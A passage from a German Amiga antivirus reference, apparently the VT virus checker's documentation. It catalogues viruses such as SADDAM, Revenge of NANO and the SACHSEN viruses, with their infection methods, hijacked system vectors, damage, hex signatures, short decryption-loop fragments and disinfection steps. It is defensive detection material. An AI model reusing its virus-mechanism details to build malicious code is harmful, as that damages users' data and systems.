  3991.           Decode angeboten. (Ja das dauert, aber eine unwichtige Disk
  3992.           koennen Sie auch gleich neu formatieren.) VT wird den BitMap-
  3993.           Block der wahrscheinlich auch im codierten Bereich liegt,
  3994.           NICHT finden. Sobald der BlockITest fertig ist, entnehmen Sie
  3995.           die Disk fuer kurze Zeit. Beim Neueinlegen sollte der BitMap-
  3996.           Block vom Betriebssystem in Ordnung gebracht werden, hoffe
  3997.           ich. Diese Disk sollten Sie noch einmal allen Tests unterziehen.
  3998.           Auch BlockKette !!!!
  3999.           Hinweis 3: Bei einigen Versuchen wurde nicht nur der Rootbereich
  4000.           codiert, sondern auch auch der BB mit Muell gefuellt. Spielen
  4001.           Sie bitte in so einem Fall ZUERST mit VT einen DOS0-BB auf die
  4002.           Disk. Danke
  4003.  
  4004.  
  4005.    - RDB Formatter 2 Virus
  4006.          Mit diesem Namen erkennt ein anderes Antivirusprogramm Files,
  4007.          die vom GlobVec144-LVirus veraendert wurden. NUR !!!! Der
  4008.          GlobVec144-LVirus enthaelt KEINE Rigid-Format-Routine !!!!!
  4009.          siehe bei GlobVec144-LVirus
  4010.          Stand: 97-03-28
  4011.  
  4012.  
  4013.    - Red October V1.7  Link   Name im Prg nicht nachvollziehbar
  4014.          auch KS2.04, Laenge Ursprungsfile ungepackt: 1296 Bytes
  4015.          keine verbogenen Vektoren, schnelle Vermehrung (20min eine
  4016.          Disk komplett verseucht). Haengt sich vor den ersten Hunk
  4017.          und verlaengert das File um 1296 Bytes. In einem verseuchten
  4018.          File ist um $500 zu lesen: timer.device, dos.library, ram:
  4019.          ram:1 . Virus meldet sich NIE. Manche verseuchten Files ver-
  4020.          suchten zwar noch erfolgreich eine Vermehrung, aber bei Aus-
  4021.          fuehrung des eigentlichen Prg.s GURU. VT versucht auch diese
  4022.          Files retten.
  4023.       Schaeden in Abhaengigkeit von der Computer-Systemzeit:
  4024.             Computer-Sekunden teilbar durch 3 = Vermehrungsversuch
  4025.             Computer-Sekunden teilbar durch 16 = RESET
  4026.         Vermehrungsbedingungen:
  4027.          - nur bei Aufruf eines verseuchten Files
  4028.          - sucht mit lock, info, examine, exnext andere Files
  4029.          - testet auf Schreibschutz (#80)
  4030.          - File ausfuehrbar ($3F3)
  4031.          - File kleiner #50000
  4032.          - File noch nicht befallen
  4033.          - KEIN Test auf Disk voll
  4034.       VT-Test: 27.03.92  Ursprungsfile wird geloescht (da gibt es
  4035.           nichts auszubauen).
  4036.           Aus verseuchten Files (auch GURU-Files s.o.) wird Link aus-
  4037.           gebaut. ALLE Files waren wieder im Originalzustand und voll
  4038.           lauffaehig.
  4039.  
  4040.    - RedGhost-AV (L)   BB
  4041.         s.u. bei Antivirus-BB
  4042.  
  4043.    - Registrator-Virus  File  s.o. bei AeReg.BBS-Trojan
  4044.  
  4045.    - Rel 01.28 Virus   File  s.o. DOOR_BELLS-Virus
  4046.  
  4047.    - Rene    siehe bei Lamer
  4048.         da im entschluesselten Programm The LAMER Ex... zu lesen ist und
  4049.         das Verhalten einem Lamervirus entspricht, halte ich eine
  4050.         Zuordnung zur Lamer-Gruppe fuer richtig.
  4051.  
  4052.    - ReOrgIt-Troj.    (Zerstoerung)
  4053.         Archivname: REORGIT.LHA    L: 52279 Bytes
  4054.         Filename:   ReOrgIt.exe    L: 60732 Bytes
  4055.         Fundort (inzwischen geloescht) : Aminet/util/wb
  4056.         Ein AMOS-Programm
  4057.         Im File ist zu lesen:
  4058.           68652e2e 2e000002 733a0010 73746172 he......s:..star
  4059.           7475702d 73657175 656e6365 000c5573 tup-sequence..Us
  4060.           65722d73 74617274 75700003 2a2e2a00 er-startup..*.*.
  4061.           000c4e6f 77207265 6f726769 6e670008 ..Now reorging..
  4062.           4861636b 46696c65 001a4841 48414841 HackFile..HAHAHA
  4063.           2c20796f 75722048 44206973 20737475 , your HD is stu
  4064.           66666564 00125375 636b6564 20696e20 ffed..Sucked in
  4065.           61727365 686f6c65 00124561 74207368 arsehole..Eat sh
  4066.           69742064 69636b20 68656164 000e5072 it dick head..Pr
  4067.           65706172 6520746f 20444945 000b416c epare to DIE..Al
  4068.           6c20446f 6e652e2e 2e000000          l Done......
  4069.         Schaden:
  4070.         Loescht s:startup-sequence und s:User-startup
  4071.         Soll loeschen: s:*.* (bei mir nicht)
  4072.         VT bietet Loeschen an.
  4073.  
  4074.  
  4075.    - REP-Virus    SCA-Clone  nur Text geaendert
  4076.           32165468 65204d65 67612d4d 69676874 2.The Mega-Might
  4077.           79205245 50202121 dc6e0000 4ef90000 y REP !!.n..N...
  4078.           00004121 52455021 52455021 52455021 ..A!REP!REP!REP!
  4079.  
  4080.    - Return Of The Lamer       PrgFileVirus    Laenge 1848 Bytes
  4081.         tarnt sich als Disk-Validator
  4082.         KickTag, KickCheckSum, BeginIo und andere
  4083.         zu erkennen an: hat im Gegensatz zum Orig.Disk-Validator keinen
  4084.         lesbaren ASCII-Text
  4085.         Schaeden in Abhaengigkeit von der Zeit:
  4086.          a) bestimmt eine Blocknummer ueber $DFF007 und schreibt 64 x
  4087.             LAMER!!! hinein
  4088.          b) Fastformatroutine fuer alle Laufwerke und ueber DisplayAlert
  4089.             Textausgabe:
  4090.             The Return Of The Lamer Exterminator
  4091.          c) schreibt den falschen Disk-Validator auf Disk
  4092.  
  4093.    - Revenge Bootloader!  Begin, KickTag, KickCheckSum, Vec5
  4094.         Fastmem: nein
  4095.         Vermehrung ueber BB
  4096.  
  4097.    - Revenge V1.2       cool,doio,vec5 , im Speicher immer $7e000
  4098.         und Speicherstelle $C0-$FF (Gefahr fuer setpatch-Liste)
  4099.         Vermehrung: ueber BB
  4100.         Schaden: nach einger Zeit neuer Mauszeiger
  4101.         im BB sichtbar: Revenge V1.2GCount:
  4102.  
  4103.    - Revenge of NANO  Typ A   Virus    File
  4104.          Laenge: 1412 Bytes
  4105.          Liegt mit unsichtbarem Filenamen ($A0A0) im Root-Verzeichnis.
  4106.          Verbogene Vektoren: Cool, OldOpenLib
  4107.          Die startup-sequence wird IMMER 3008 Bytes lang.
  4108.              Probleme deshalb siehe bei Typ B
  4109.          Im File ist zu lesen:
  4110.             61727900 000151f0 00000000 3aa0a000 ary...Q.....:...
  4111.                                        ^^^^^^
  4112.             3a732f73 74617274 75702d73 65717565 :s/startup-seque
  4113.             6e636500 a0a00a0a 49206861 74652043 nce.....I hate C
  4114.             6f6d6d6f 646f7265 20212121 00005265 ommodore !!!..Re
  4115.             76656e67 65206f66 204e414e 4f202121 venge of NANO !!
  4116.             210000c8 0a2e2e2e 616e6f74 68657220 !.......another
  4117.          Das Programm meldet sich in Abhaengigkeit von einer Zaehlzelle:
  4118.             #50 = DisplayAlert
  4119.             #100 = SetWindowTitle
  4120.  
  4121.    - Revenge of NANO  Typ B   Virus    File
  4122.          Laenge: 2400 Bytes
  4123.          Liegt mit unsichtbarem Filenamen ($A0A0) im Root-Verzeichnis.
  4124.          Verbogene Vektoren: Cool, DoIo, $6c, open, Lock, Loadseg
  4125.                              Openwindow
  4126.          Die startup-sequence wird IMMER 3008 Bytes lang.
  4127.             startup-sequence
  4128.             0000: a0a00a0a 203b636c 730a0a00 00000000 .... ;cls.......
  4129.                   ^^^^^^^^ ;unsichtbar immer 1. Zeile
  4130.             0010: 00000000 00000000 00000000 00000000 ................
  4131.                    ;usw.
  4132.          Probleme dadurch:
  4133.            - auf der Disk war zuwenig Platz => Aerger
  4134.            - Die Ursprungs-startup war laenger. Der Rest wird einfach
  4135.              abgeschnitten.
  4136.            - Die Ursprungs-startup war kuerzer. Der Rest wird aufgefuellt.
  4137.              z.B. mit Nullen siehe oben
  4138.              Einige Editoren kommen mit so einem File nicht zurecht.
  4139.              Kopieren Sie das File in die RAM. Protect-Flags aendern sich.
  4140.              Loeschen Sie das File auf Disk. (nicht ueberschreiben!!)
  4141.              Loeschen Sie die erste Zeile ($A0A0,0a,0a). Kopieren Sie
  4142.              Sie das File von RAM nach DF0 .
  4143.          Das Programm meldet sich in Abhaengigkeit von einer Zaehlzelle
  4144.              (#50, #100, #150):
  4145.              50: = DisplayAlert
  4146.                 ...another masterpiece by N A N O !!!
  4147.                    GREETINGS TO:
  4148.                 1 Byte Bandit, Byte Warrior,DEF JAM, DiskDoctors
  4149.                 B FANTASY, Foundation For The Extermination Of Lamers,
  4150.                 N I.R.Q. Team, Obelsik Softworks Crew, S.C.A., UNIT A ...
  4151.              100: = aendere windowtitle und screentitle
  4152.                      "I hate giants !!!",0
  4153.                      "Revenge of NANO !!!",0
  4154.              150: Fenster oeffnen
  4155.                "CON:10/20/600/140/ some melancholics ...",0"
  4156.                " ",0a
  4157.                "   The Life is beautiful !",0a
  4158.                " ",0a
  4159.                "   The Life is awful !",0a
  4160.                " ",0a
  4161.                "   The Life is a Fun !",0a
  4162.                " ",0a
  4163.                "   The Life is a Pain !",0a
  4164.                " ",0a
  4165.                "   But only the death is the way you should join in ! ",0a
  4166.           Fileauszug (Texte sind nicht codiert):
  4167.               00003aa0 a0003a73 2f737461 72747570 ..:...:s/startup
  4168.               2d736571 75656e63 6500a0a0 0a0a434f -sequence.....CO
  4169.                    ;......          ^^^^^^^^^
  4170.               69616e74 73202121 21005265 76656e67 iants !!!.Reveng
  4171.               65206f66 204e414e 4f202121 210000c8 e of NANO !!!...
  4172.           Hinweis 1: Vt versucht alle Vektoren zurueckzusetzen. Ueberlegen
  4173.           Sie aber bitte, ob Sie nicht doch zur Sicherheit einen KRESET
  4174.           durchfuehren. Die Vektoren sind in sich verschachtelt.
  4175.           Hinweis 2:
  4176.           Falls das Virusfile ueber die startup-sequence aktiviert wurde,
  4177.           so haengt ein Lock (202 Objekt in use). VT gibt dann beim Loesch-
  4178.           versuch einen DosError aus. Booten Sie bitte dann von einer
  4179.           sauberen Disk neu und loeschen Sie das unsichtbare File von Hand.
  4180.           Bitte vergessen Sie nicht, die startup-sequence zu aendern.
  4181.  
  4182.  
  4183.    - Revenge of the Lamer   PrgFileVirus Laenge 4560 Bytes
  4184.                nur KRESET (Entschuldigung)
  4185.                es werden mir zuviele Zeiger verbogen (10!!)
  4186.                entschluesselt steht im Speicher:
  4187.                dos.library.graphics.library.intuition.library.
  4188.                trackdisk.device.DOS s/startup.sequence   usw.
  4189.                Name:$A0A0A0A0A0 steht im Hauptverzeichnis und
  4190.                1.Zeile Startup
  4191.                testet vor Vermehrung ob genuegend Platz auf Disk ist
  4192.                nach 6 Resets (denke ich), Formatieren aller eingelegten
  4193.                nicht schreibgeschuetzten Disks
  4194.                3 Seiten Alert-Meldung
  4195.  
  4196.    - Revenge of the Lamer 2
  4197.                PrgFileVirus   Laenge 4448 Bytes
  4198.                einige Write-Test-Routinen fehlen,
  4199.                sonst wie Revenge of the Lamer
  4200.  
  4201.    W A R N U N G: es ist mir beim Testen gelungen, Revenge of the
  4202.       Lamer 1 u. 2 so zu vermehren, dass SID und andere Prg.e die
  4203.       5 A0  n i c h t  anzeigen. Mein FileRequester auch nicht. Das
  4204.       VirusPrg. wird aber  a u c h  bei diesen Disks aktiviert und
  4205.       vermehrt sich !!!  Mit einem DiskMonitor kann das Prg. ge-
  4206.       funden werden. Bei meinem PrgTest erscheint dann:
  4207.                Rev. Lam. unsichtbar
  4208.       Dies ist kein Schwachsinn, sondern der Sachverhalt wurde von
  4209.       anderen Programmierern nach meiner Entdeckung gegengeprueft und
  4210.       eine Fehlfunktion bei ExNext KS1.3 entdeckt. Dieser Fehler ist
  4211.       bei KS2.0 behoben.
  4212.       (vgl. auch Fish 429  Dr.doc)
  4213.  
  4214.    - RIPPER             Programcode = Northstar, nur anderer Text
  4215.                         cool im Prg. DoIo  immer ab $7ec00
  4216.                         Vermehrung: BB
  4217.       Text (auch im BB sichtbar):ATARI KILLS COMMODORE! RIP! RIP THE RIPPER
  4218.       usw.
  4219.  
  4220.    - Riska   Forpib-Clone     s.o.
  4221.  
  4222.    - Rob Northern   File    Laenge: 2616    BGS9 Clone  s.o
  4223.          Rob Northern im File lesbar
  4224.          Anfaengeraenderung:      !!!!
  4225.          testet immer noch auf TTV1 obwohl nicht mehr vorhanden
  4226.          schreibt nur 2608 Bytes zurueck (Geruechte behaupten, dies
  4227.          waere die Originallaenge von BGS9 ???)
  4228.          vergisst 3F3 zu schreiben
  4229.          d.h. ein vermehrtes Prg ist NICHT mehr lauffaehig
  4230.          d.h. die startup-sequence einer verseuchten Disk bricht ab
  4231.          VT findet weiterhin BGS9 im Speicher.
  4232.          Bei BlockKette wird Rob nicht gefunden, da 3F3 fehlt.
  4233.          Ausbau mit FileTest.  Stand 14.03.92
  4234.  
  4235.  
  4236.    - Rude Xerox = DIGITAL AGE = Forpib-Clone
  4237.          nur Text geaendert
  4238.  
  4239.    - SACHSEN VIRUS NO.1    Cool, immer ab $78000
  4240.          fordert trackdisk.device
  4241.          BB-Teile codiert mit  move.b #$70,d0
  4242.                                add.b d0,(a0)+
  4243.          decodiert im Speicher: ** SACHSEN VIRUS NO.1 ** usw
  4244.          Vermehrung: BB
  4245.          sonst keine Schaeden und keine Meldung
  4246.          GURU-Gefahr: sobald das Virus im Speicher ist und ein RESET
  4247.          ausgefuehrt wird, wird CloseDevice verbogen. Mit FastMem ab
  4248.          $200000 dann GURU.
  4249.  
  4250.    - SACHSEN VIRUS NO.3    Cool, DoIo, Wait, immer ab $78000
  4251.          belegt Block 0-3  (d.h. ein File ab Block 2 wird auch zerstoert.
  4252.          Fordert trackdisk.device NICHT  (HD!!!!)
  4253.          Alle Texte codiert.
  4254.          Vermehrung: BootBlock 0 - 3
  4255.          Schaeden:
  4256.          Schreibt nach Block 880 (Root bei Disk) neuen Disknamen
  4257.             SACHEN NO.3 ON DISK !!!
  4258.          Schreibt in Block (abhaengig von $DFF006) 64 x SACHSEN3
  4259.          Sollte dieser Block in einem File liegen, so ist dieses
  4260.          File NICHT mehr zu retten.
  4261.          DisplayAlert und dann RESET
  4262.             SACHSEN VIRUS NO.3 in Generation :        is running...
  4263.                (bei mir Generation 23)
  4264.  
  4265.    - SADDAM HUSSEIN Bootblockvirus    (vgl. auch BlowJob)
  4266.          KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7f000
  4267.          Taeuscht durch Text im Bootblock:
  4268.          A2000 MB Memory Controller V2
  4269.          Vermehrung und Schaden: Bootblock
  4270.          Sobald die Zaehlzelle den Wert $7530 erreicht hat, wird ein
  4271.          Programmteil mit subi.b #$71,D0 entschluesselt und mit display-
  4272.          Alert der Text ausgegeben:
  4273.           TOO BAD BROTHER ... SADDAM HUSSEIN STRIKES BACK !!!
  4274.           THE ONLY ESCAPE IS TO TURN THE POWER OFF !!!
  4275.  
  4276.  
  4277.    - SADDAM-VIRUS     Disk-Validator   Laenge:1848 Bytes
  4278.      VT versucht die Disk-Validator-Files zu unterscheiden:
  4279.        - SADDAM
  4280.           - verwendet sub #2,d0
  4281.                - verwendet IRAK  (decodiert: SADDAM VIRUS)
  4282.                    - verwendet 41fa000a
  4283.                        - schreibt nach DF0
  4284.                        - schreibt nach DF1  
  4285.                    - verwendet 41fa0010
  4286.                        - schreibt nach DF0
  4287.                        - schreibt nach DF1
  4288.                - verwendet:
  4289.                  363636a0, a0a0a0a0, HARD, KICK, LAME, LOOM, RISC, IRAN
  4290.                  NATO, 4711, AFFE
  4291.           - verwendet sub #3,d0
  4292.              SADDAM ][ (decodiert auch so zu lesen)
  4293.                - verwendet IRAK
  4294.                - verwendet 1.29
  4295.           - verwendet sub #2,d6
  4296.              SADDAM 7 (decodiert auch so zu lesen)
  4297.           - andere
  4298.               - 1234
  4299.               - LoopC.
  4300.               - RootFormat
  4301.           - in File
  4302.               - SnoopDos
  4303.               - zu langes File (14524)
  4304.        - ungewoehnliche Disk-Validator-Files (MUSS KEIN Virus sein !!!)
  4305.           - CD17BitD Disk2932
  4306.           - CD17BitD Disk2936
  4307.           - usw.
  4308.       KS2.04 und hoeher NEIN  (Disk-Validator liegt da im ROM)
  4309.       Festplatte NEIN  (es wird mit trackdisk.device gearbeitet)
  4310.       HINWEIS: wird manchmal von VirusX mit Australian Parasite
  4311.       verwechselt !!!!
  4312.       Das erste Virusprogramm, das mit 1 MB Chip, Kick1.3 und OHNE
  4313.       setpatch r einen Reset mit der Tastatur uebersteht !!!!!!!!
  4314.       Cold, BeginIo, Close im Trackdisk.device, Rasterstrahl $90(a6)
  4315.       im Prg. dann noch OpenWindow, InitResident, direkte Dos.lib-Ein-
  4316.       spruenge.
  4317.  
  4318.       entschluesselt im Speicher mit:    eor.b d0,(a0)+
  4319.                                          subq.l #2,d0
  4320.                                          dbra d1,loop
  4321.  
  4322.       Zum Verschluesseln eines neuen SADDAM-Disk-Validators wird
  4323.       ein Wert aus $DFF007 in d0 abgelegt.
  4324.  
  4325.       Speicherlage: SysStkLower - veraenderter Wert aus $DFF007 - Virus-
  4326.                     programmlaenge
  4327.  
  4328.       Name decodiert: " SADDAM VIRUS"
  4329.  
  4330.       Schaeden und Gefahren:
  4331.       Das Einlegen einer Disk mit ungueltiger BitMap genuegt,
  4332.       um SADDAM zu aktivieren !!!!
  4333.       abhaengig von der Zaehlzelle:
  4334.       KopfStep alle Laufwerke (Disk danach BAD) und DisplayAlert:
  4335.                             SADDAM-VIRUS
  4336.       Ueberschreibt jeden echten Disk-Validator auf einer ungeschuetzten
  4337.       Disk !!!!!
  4338.       Falls auf einer Disk kein l-Dir vorhanden ist, wird es erstellt
  4339.       und dann der verseuchte Disk-Validator hineinkopiert. Noch KEIN
  4340.       anderes Virusprogramm hat Unterverzeichnisse angelegt !!!!
  4341.       Sucht ueber den FileHeaderBlock den ersten FileDataBlock und
  4342.       schreibt in T.DATA das LWort IRAK . Der Rest des FileDataBlocks
  4343.       wird mit    eor.l d1,(a0)+
  4344.                   dbra d0,loop
  4345.               verschluesselt. Bei aktivem SADDAM-VIRUS wird statt IRAK
  4346.       der richtige Wert 8 angezeigt! (Taeuschung !! vgl. Lamergruppe,
  4347.       die sauberen BB vortaeuscht!)
  4348.       Schreibt manchmal in ROOT in $13c (=Zeiger auf BitMapBlock) den
  4349.       Wert Null. Mit Glueck finden Sie in $140 den Originalwert (abge-
  4350.       legt vom Virusprogramm) .
  4351.       Wenn Sie Pech haben, hat ein anderer Virusprogrammteil diese
  4352.       Stelle kurz danach auch auf Null gesetzt. Versuchen Sie dann mit
  4353.       einer Bootdisk den OriginalDisk-Validator zu starten oder versuchen
  4354.       Sie mit einem Disk-Monitor zu Fuss den BitMapBlock zu finden und
  4355.       wieder in $13c einzutragen. Oder lesen Sie BitMapTest.dok (11.07.91)
  4356.       Hinweis: Versuchen Sie bitte NICHT decode IRAK auf einem fms.device
  4357.          (Grund: phys. und logischer Block verschieden). Sie muessen
  4358.          IRAK auf einer Disk decodieren !!!!!
  4359.       Hinweis 2: Ich besitze inzwischen (21.10.91) einen SADDAM-Disk-
  4360.          Validator mit der Laenge: 1892 Bytes . Dieser Disk-Validator
  4361.          aktiviert sich trotz Null in $138 und $13c nicht, sondern der
  4362.          System-Requester erscheint !!!!
  4363.       Hinweis 3: Um IRAK-codierte Bloecke zu reparieren, verwenden Sie
  4364.          bitte BlockITest. Geht sehr schnell im Vergleich zum FileTest.
  4365.          Danke
  4366.       Hinweis 4  28.07.93
  4367.          WICHTIG !!!!!  Dieser Hinweis gilt NUR fuer KS1.3, da ab KS2.04
  4368.          der Disk-Validator im ROM sitzt.
  4369.          Es handelt sich um ein "brutales" Vorgehen, das Sie nur als
  4370.          letzte Rettung verwenden sollten.
  4371.          Mir wurde eine Disk zugeschickt, die neben dem SADDAM-Disk-Vali-
  4372.          dator auch noch jede Menge bad-HeaderKey-Fehler hatte. Der
  4373.          Bitmapzeiger war noch in Ordnung !!! und es waren noch keine
  4374.          Files codiert.
  4375.          Unter KS2.04 konnte das Virus-File ohne Probleme geloescht wer-
  4376.          den.
  4377.          Aber mit KS1.3 gab es Probleme wegen der anderen Fehler.
  4378.          Gefundener und mehrmals wiederholter Weg:
  4379.           - Man braucht KS1.3 (und nur dann kann dieser Weg notwendig
  4380.                                sein, zusaetzliche Fehler siehe oben)
  4381.           - Eine SCHREIBGESCHUETZTE Bootdisk mit sauberen Disk-Validator
  4382.           - Eine verseuchte Disk mit zusaetzlichen Fehlerquellen.
  4383.          Ablauf:
  4384.          Starten Sie VT
  4385.          Falls VT SADDAM im Speicher findet, loeschen.
  4386.          Dann RootblockTest
  4387.             - bei Bedarf Bitmapzeiger richten
  4388.             - Disk-Validator umbenennen in fal.DisV
  4389.          Dann BlockITest
  4390.             - sobald VT SADDAM findet
  4391.                  - zeigen
  4392.                  - loeschen  (Frage nach Filetest ignorieren)
  4393.          Dann BB->File->BB
  4394.             - Laufwerk waehlen
  4395.             - L waehlen
  4396.             - fal.DiskV anklicken
  4397.             - Delete
  4398.          Falls jetzt groessere Fehler ausser SADDAM auf der Disk sind,
  4399.          erscheint ein GURU. (Hat nichts mit VT zu tun, sondern mit
  4400.          dem Betriebssystem)
  4401.          Falls nur ein LW, Disk entnehmen und von sauberer Disk neu
  4402.          booten.
  4403.          SADDAM-Disk einlegen
  4404.          Requester erscheint und verlangt Bootdisk (wg.Disk-Validator).
  4405.          Bootdisk einlegen und wieder entnehmen.
  4406.          SADDAM-Disk einlegen und warten bis Licht ausgeht. Original-
  4407.          Disk-Validator behebt Fehler.
  4408.          VT-Disk einlegen und VT starten.
  4409.          SADDAM-Disk einlegen
  4410.          mit BB->File->BB  fal.DiskV loeschen. Geht jetzt OHNE GURU.
  4411.          Dieser Diskwechsel entfaellt bei 2 LWen. Legen Sie ihre
  4412.          Saubere Bootdisk in DF0 und die SADDAM-Disk in DF1 .
  4413.          Hinweis fuer Othmar: Die bad HeaderKey-Fehler werden behoben,
  4414.          wenn Sie jetzt alle Files von der ehemaligen SADDAM-Disk im
  4415.          Einzelfile-Copymodus (also copy df1: ram: all) ins RAM kopieren
  4416.          und dann wieder zurueck (copy ram: df1: all) .
  4417.          Nocheinmal !!! Dieser umstaendliche Weg war nur notwendig:
  4418.              - bei KS1.3
  4419.              - wegen der bad HeaderKey-Fehler
  4420.                (die gleiche Disk OHNE bad HeaderKey war auch unter
  4421.                 KS1.3 ohne Probleme zu bearbeiten. Also loesche
  4422.                 SADDAM-Virus mit FileTest !!!)
  4423.  
  4424.    - SADDAM-Clones  verwenden statt IRAK  LAME, LOOM, RISC,
  4425.          a0a0a0a0, 363636a0  usw.
  4426.          Testen Sie mit BlockITest und verneinen Sie decode und schauen
  4427.          sich den Block an. Langwort 0 enthaelt das Erkennungslangwort.
  4428.          Decode in BlockITest sollte richtig arbeiten. Falls nein, rufen
  4429.          Sie mich bitte an. Danke
  4430.    - SADDAM-Clones Teil2:
  4431.          Es sind einige Clones (z.B. SADDAM 2 u. 4  (Name nicht nachvoll-
  4432.          ziehbar) ) aufgetaucht, die als Disk-Validator etwas anders
  4433.          codiert sind. Sind von VT aber schon (l:Disk-Validator) beim
  4434.          Filetest als falsch erkannt worden. Naja jetzt hab ich sie und
  4435.          konnte einen Test durchfuehren. Danke
  4436.  
  4437.    - SADDAM-7 Disk-Validator
  4438.          Vermehrung mit KS1.3 als Disk-Validator: ja
  4439.          Codiert die Files nicht, sondern zerstoert die Files, indem
  4440.          SADDAM7! hineingeschrieben wird. Diese Files sind NICHT zu
  4441.          retten. Beim 2. Versuch ein anderes File zu laden und damit
  4442.          zu zerstoeren, habe ich IMMER den GURU3 gesehen. Das Teil muesste
  4443.          sich also sehr schnell verraten.
  4444.                      Block:     890
  4445.             0000: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7!
  4446.             0010: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7!
  4447.             0020: 53414444 414d3721 53414444 414d3721 SADDAM7!SADDAM7!
  4448.          VT kann deshalb nur File loeschen anbieten.
  4449.  
  4450.    - SADDAM-File  Laenge: 14524 Bytes   NICHT lauffaehig  Error 121
  4451.          Grund: Hunklaengenangabe immer noch $1c5 . Sofort loeschen
  4452.  
  4453.    - SADDAM ][  Disk-Validator  Laenge: 1848 Bytes
  4454.          Verhalten: s.o.
  4455.          Schreibt IRAK
  4456.          Aenderungen:
  4457.          Name: "  SADDAM ][  "
  4458.          andere Decodierroutine:
  4459.              z.B.   subq.l #3,d0  (Orig. subq.l #2,d0)
  4460.        Nachtrag 02.01.93: Clone aufgetaucht. Verwendet als Kennung 1.29
  4461.        Nachtrag 15.04.93: Mir wurde ein SADDAM ][ zugeschickt, der
  4462.          sofort mit GURU bei Benutzung antwortet. Ein Anfaenger, wahr-
  4463.          scheinlich mit Monitor-Kenntnissen, hat genau in der Codier-
  4464.          Routine zugeschlagen. Mit diesem Teil ist KEINE Verseuchung
  4465.          moeglich. Loeschen Sie das Teil aus L: und kopieren Sie den
  4466.          Original-Disk-Validator neu.
  4467.  
  4468.    - SADDAM-Clone besondere Art  Name geaendert in HARDEX VIRUS
  4469.          Soll statt IRAK  HARD  schreiben. Wie das gehen soll, ist
  4470.          mir aber noch nicht klar.
  4471.          Begruendung:
  4472.          Der Nachprogrammierer hat nicht nur Namen geaendert, sondern
  4473.          auch noch 'trackdisk.device' geloescht. Deshalb kann BeginIo
  4474.          nicht verbogen werden. Also keine Codierung eines Blocks
  4475.          moeglich. VT erkennt SADDAM . Bitte einfach loeschen.
  4476.      Nachtrag 05.03.93: es ist ein neuer Clone augetaucht.
  4477.          Laurin-Virus  Wird von VT als SADDAM-Clone erkannt.
  4478.          Blocklangwort: $a0a0a0a0
  4479.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4480.            74726163 6B646973 6B2E6465 76696365 trackdisk.device
  4481.            00010820 4C617572 696E2056 69727573 ... Laurin Virus
  4482.          Behandlung: siehe bei SADDAM
  4483.      Hinweis 05.03.93: Falls Sie noch mit KS1.3 arbeiten, so kopieren
  4484.          Sie sich bitte einen ORIGINAL-Disk-Validator auf die VT-Disk.
  4485.          Die Arbeit wird erleichtert. Ich darf das nicht, da es sich
  4486.          um ein Commodore-File handelt.
  4487.      Nachtrag 28.03.93: es ist ein neuer Clone aufgetaucht.
  4488.          Animal-Virus  Wird von VT als SADDAM-Clone erkannt.
  4489.          Blocklangwort: $363636a0
  4490.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4491.            74726163 6B646973 6B2E6465 76696365 trackdisk.device
  4492.            00010820 416E696D 616C2056 69727573 ... Animal Virus
  4493.          Behandlung: siehe bei SADDAM
  4494.      Nachtrag 09.04.93: es ist ein neuer Clone aufgetaucht.
  4495.          KICK-Virus  Wird von VT als SADDAM-Clone erkannt.
  4496.          Blocklangwort: KICK
  4497.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4498.            6b2e6465 76696365 00010820 204b4943 k.device...  KIC
  4499.            4b202056 49525553 00000000 03f30000 K  VIRUS........
  4500.            00000000 00010000 00000000 00000000 ................
  4501.            01c50000 03e90000 01c55573 65204b69 ..........Use Ki
  4502.            636b7374 61727420 312e322f 312e3300 ckstart 1.2/1.3.
  4503.            00000000 00000000 00000000 00000000 ................
  4504.          Use Kick... ist uncodiert im Disk-Validator-File zu lesen.
  4505.          Behandlung: siehe bei SADDAM
  4506.      Nachtrag 18.04.93: es ist ein neuer Clone aufgetaucht.
  4507.          NATO-Virus . Wird von VT als SADDAM-Clone erkannt.
  4508.          Blocklangwort: NATO
  4509.          Namensbegruendung: im Speicher ist decodiert zu lesen
  4510.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4511.            00010820 20204e41 544f2056 49525553 ...   NATO VIRUS
  4512.            00000000 03f30000 00000000 00010000 ................
  4513.            00000000 00000000 01c50000 03e90000 ................
  4514.            01c54772 65617465 73742048 756d616e ..Greatest Human
  4515.            20204572 726f7200 00000000 00000000   Error.........
  4516.          Greatest... ist uncodiert im Disk-Validator-File zu lesen.
  4517.          Behandlung: siehe bei SADDAM
  4518.      Nachtrag 15.05.93: es ist ein neuer Clone aufgetaucht.
  4519.          AFFE-Virus . Wird von VT als SADDAM-Clone erkannt.
  4520.          Blocklangwort: AFFE
  4521.          Im Speicher ist zu lesen:
  4522.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4523.            00010820 476f7269 6c612056 69727573 ... Gorila Virus
  4524.            00000000 03f30000 00000000 00010000 ................
  4525.            00000000 00000000 01c50000 03e90000 ................
  4526.            01c52167 6e696874 6f6e2079 61732c72 ..!gnihton yas,r
  4527.            6165682c 65655300 00000000 00000000 aeh,eeS.........
  4528.          Man koennte auch Gorilla richtig schreiben.
  4529.      Nachtrag 18.05.93: es ist ein neuer Clone aufgetaucht.
  4530.          IRAN-Virus . Wird von VT als SADDAM-Clone erkannt.
  4531.          Blocklangwort: IRAN
  4532.          Im Speicher ist zu lesen: 
  4533.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4534.            00010820 41796174 6f6c6c61 68766972 ... Ayatollahvir
  4535.            00000000 03f30000 00000000 00010000 ................
  4536.            00000000 00000000 01c50000 03e90000 ................
  4537.            01c56e61 6320756f 79207461 6877206c ..nac uoy tahw l
  4538.            6c61206c 6c696b00 00000000 00000000 la llik.........
  4539.          Ist schon schlecht, dass man mit einem Speichermonitor
  4540.          Virus abkuerzen muss, weil man nicht sagen kann, ob man
  4541.          das naechste Null-Wort noch verwenden darf. Meine
  4542.          Empfehlung: Gebts endlich auf. Jeder gesteht euch zu,
  4543.          dass ihr einen Satz fast vollstaendig richtig rueckwaerts
  4544.          schreiben koennt. Aber von Viren habt ihr KEINE Ahnung.
  4545.          Und ein AntiVirusPrg verwirrt ihr SO NIE.
  4546.      Nachtrag 24.05.93: es ist ein neuer Clone aufgetaucht.
  4547.          GRAL-Virus . Wird von VT als SADDAM-Clone erkannt.
  4548.          Blocklangwort: GRAL
  4549.          Im Speicher ist zu lesen:
